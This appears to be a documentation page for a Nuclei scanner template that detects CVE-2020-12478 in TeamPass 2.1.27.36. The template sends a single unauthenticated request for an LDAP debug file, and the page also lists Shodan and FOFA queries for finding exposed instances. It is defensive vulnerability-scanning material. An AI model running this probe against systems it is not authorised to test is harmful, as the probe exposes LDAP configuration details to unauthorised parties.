TeamPass 2.1.27.36 - Improper Authentication
ID: CVE-2020-12478
Severity: high
Author: arafatansari
Tags: cve2020,cve,teampass,exposure,unauth
Description
Section titled “Description”TeamPass 2.1.27.36 is susceptible to improper authentication. An attacker can retrieve files from the TeamPass web root, which may include backups or LDAP debug files, and therefore possibly obtain sensitive information, modify data, and/or execute unauthorized operations.
YAML Source
Section titled “YAML Source”id: CVE-2020-12478
info: name: TeamPass 2.1.27.36 - Improper Authentication author: arafatansari severity: high description: | TeamPass 2.1.27.36 is susceptible to improper authentication. An attacker can retrieve files from the TeamPass web root, which may include backups or LDAP debug files, and therefore possibly obtain sensitive information, modify data, and/or execute unauthorized operations. impact: | An attacker can bypass authentication and gain unauthorized access to sensitive information. remediation: | Upgrade to a patched version of TeamPass or apply the recommended security patches. reference: - https://github.com/nilsteampassnet/TeamPass/issues/2764 - https://nvd.nist.gov/vuln/detail/CVE-2020-12478 - https://github.com/ARPSyndicate/cvemon - https://github.com/ARPSyndicate/kenzer-templates - https://github.com/StarCrossPortal/scalpel classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 7.5 cve-id: CVE-2020-12478 cwe-id: CWE-306 epss-score: 0.01338 epss-percentile: 0.86048 cpe: cpe:2.3:a:teampass:teampass:2.1.27.36:*:*:*:*:*:*:* metadata: verified: true max-request: 1 vendor: teampass product: teampass shodan-query: http.html:"teampass" fofa-query: body="teampass" tags: cve2020,cve,teampass,exposure,unauth
http: - method: GET path: - "{{BaseURL}}/files/ldap.debug.txt"
matchers-condition: and matchers: - type: word part: body words: - 'Get all LDAP params'
- type: word part: header words: - "text/plain"
- type: status status: - 200# digest: 4a0a00473045022100bb0588f2b00d2a099e3ce379b1d8e65bc03dca7c5e1d4b076d63a379d14cd0a002203af7d9b9d3b5faef3c099d80870cc4a629160535d2e9959621f69290014ddb65:922c64590222798bb761d5b6d8e72950Guide to check the vulnerabilities
Section titled “Guide to check the vulnerabilities”This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.
$ nuclei -u "URL" -t "http/cves/2020/CVE-2020-12478.yaml"